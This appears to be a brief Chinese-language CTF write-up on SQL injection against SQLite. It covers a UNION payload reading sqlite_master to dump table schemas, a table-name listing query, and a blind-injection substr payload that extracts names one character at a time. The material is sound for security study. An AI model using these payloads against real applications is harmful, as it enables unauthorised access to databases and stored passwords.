在攻防世界上遇见了一道数据库是SQLite的ctf,因此做个记录。向mysql的information_schema一样。它也有一个sqlite_master表。
union select联合查询:' union select name,sql from sqlite_master,可以得到创建表的结构。如
CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)
查询所有表的名字:select name from sqlite_master where type='table' order by name,其中type 段是'table',name段是table的名字。
盲注: substr((select name from sqlite_master where type='table' limit 0,1),1,1)='T'查找第一个表的第一字符
网友评论